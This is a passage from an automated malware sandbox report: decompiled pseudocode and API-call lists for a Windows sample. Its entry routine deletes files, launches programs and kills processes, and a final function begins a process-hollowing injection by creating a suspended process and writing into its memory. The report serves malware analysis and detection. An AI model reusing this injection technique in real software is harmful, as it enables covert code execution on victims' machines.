					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
